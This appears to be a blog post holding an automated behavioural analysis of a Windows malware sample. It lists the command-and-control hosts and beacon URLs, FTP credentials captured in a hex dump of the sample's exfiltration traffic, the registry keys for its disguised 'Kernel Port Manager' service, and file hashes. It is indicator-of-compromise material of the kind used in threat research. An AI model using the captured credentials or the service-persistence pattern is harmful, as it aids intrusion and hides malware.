109.235.49.236

By Pig, October 30, 2010

Remote Host Port Number
109.235.49.157 80
109.235.49.236 21
109.235.49.236 35254

* The data identified by the following URLs was then requested from the remote web server:
o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=..
o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=.

USER rnew05@net4speed.net
USER cnew05@net4speed.net

00000000 | 5041 5353 2063 6E25 7724 7033 3364 4021 | PASS cn%w$p33d@!
00000010 | 40E0 E133 3432 0D0A 5057 440D 0A43 5744 | @..342..PWD..CWD
00000020 | 202F 0D0A 4D4B 4420 636E 6577 3035 4F52 | /..MKD cnew05OR
00000030 | 544E 0D0A 4357 4420 636E 6577 3035 4F52 | TN..CWD cnew05OR
00000040 | 544E 0D0A 4D4B 4420 434F 4D50 5554 4552 | TN..MKD COMPUTER
00000050 | 4E41 4D45 0D0A 4357 4420 434F 4D50 5554 | NAME..CWD COMPUT
00000060 | 4552 4E41 4D45 0D0A 5459 5045 2049 0D0A | ERNAME..TYPE I..
00000070 | 5041 5353 2036 3534 3332 310D 0A50 4153 | PASS 654321..PAS
00000080 | 560D 0A53 544F 5220 5769 6E64 6F77 7355 | V..STOR WindowsU
00000090 | 7064 6174 652E 6C6F 670D 0A50 5744 0D0A | pdate.log..PWD..
000000A0 | 4D4B 4420 434F 4D50 5554 4552 4E41 4D45 | MKD COMPUTERNAME
000000B0 | 5F63 6E65 7730 354F 5254 4E0D 0A43 5744 | _cnew05ORTN..CWD
000000C0 | 2043 4F4D 5055 5445 524E 414D 455F 636E | COMPUTERNAME_cn
000000D0 | 6577 3035 4F52 544E 0D0A 5459 5045 2041 | ew05ORTN..TYPE A
000000E0 | 0D0A 5041 5356 0D0A 4C49 5354 0D0A | ..PASV..LIST..

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_KERNELPORT
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_KERNELPORT000
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_KERNELPORT000Control
o HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceskernelport
o HKEY_LOCAL_MACHINESYSTEMControlSet001ServiceskernelportSecurity
o HKEY_LOCAL_MACHINESYSTEMControlSet001ServiceskernelportEnum
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_KERNELPORT
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_KERNELPORT000
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_KERNELPORT000Control
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceskernelport
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceskernelportSecurity
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceskernelportEnum

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_KERNELPORT000Control]
+ *NewlyCreated* = 0x00000000
+ ActiveService = “kernelport”
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_KERNELPORT000]
+ Service = “kernelport”
+ Legacy = 0x00000001
+ ConfigFlags = 0x00000000
+ Class = “LegacyDriver”
+ ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”
+ DeviceDesc = “Kernel Port Manager”
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_KERNELPORT]
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMControlSet001ServiceskernelportEnum]
+ 0 = “RootLEGACY_KERNELPORT000”
+ Count = 0x00000001
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMControlSet001ServiceskernelportSecurity]
+ Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
o [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceskernelport]
+ Type = 0x00000010
+ Start = 0x00000002
+ ErrorControl = 0x00000001
+ ImagePath = “[file and pathname of the sample #1]”
+ DisplayName = “Kernel Port Manager”
+ ObjectName = “LocalSystem”
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_KERNELPORT000Control]
+ *NewlyCreated* = 0x00000000
+ ActiveService = “kernelport”
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_KERNELPORT000]
+ Service = “kernelport”
+ Legacy = 0x00000001
+ ConfigFlags = 0x00000000
+ Class = “LegacyDriver”
+ ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”
+ DeviceDesc = “Kernel Port Manager”
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_KERNELPORT]
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceskernelportEnum]
+ 0 = “RootLEGACY_KERNELPORT000”
+ Count = 0x00000001
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceskernelportSecurity]
+ Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceskernelport]
+ Type = 0x00000010
+ Start = 0x00000002
+ ErrorControl = 0x00000001
+ ImagePath = “[file and pathname of the sample #1]”
+ DisplayName = “Kernel Port Manager”
+ ObjectName = “LocalSystem”
o [HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings]
+ ProxyEnable = 0x00000000

* The following Registry Values were modified:
o [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlServiceCurrent]
+ (Default) =
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlServiceCurrent]
+ (Default) =
o [HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders]
+ Cookies =
+ History =

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
[filename of the sample #1] [file and pathname of the sample #1] 36 864 bytes

* There was a new service created in the system:

Service Name Display Name Status Service Filename
kernelport Kernel Port Manager “Running” [file and pathname of the sample #1]

File System Modifications

* The following file was created in the system:

# Filename(s) File Size File Hash
1 [file and pathname of the sample #1] 37 142 bytes MD5: 0xF9E71EF129D422AD638715F837C55CCD
SHA-1: 0xB3B6BACB8E34FC86C6D77825FA6DA2574ED751F9

Categories: Uncategorized
Previous post
Next post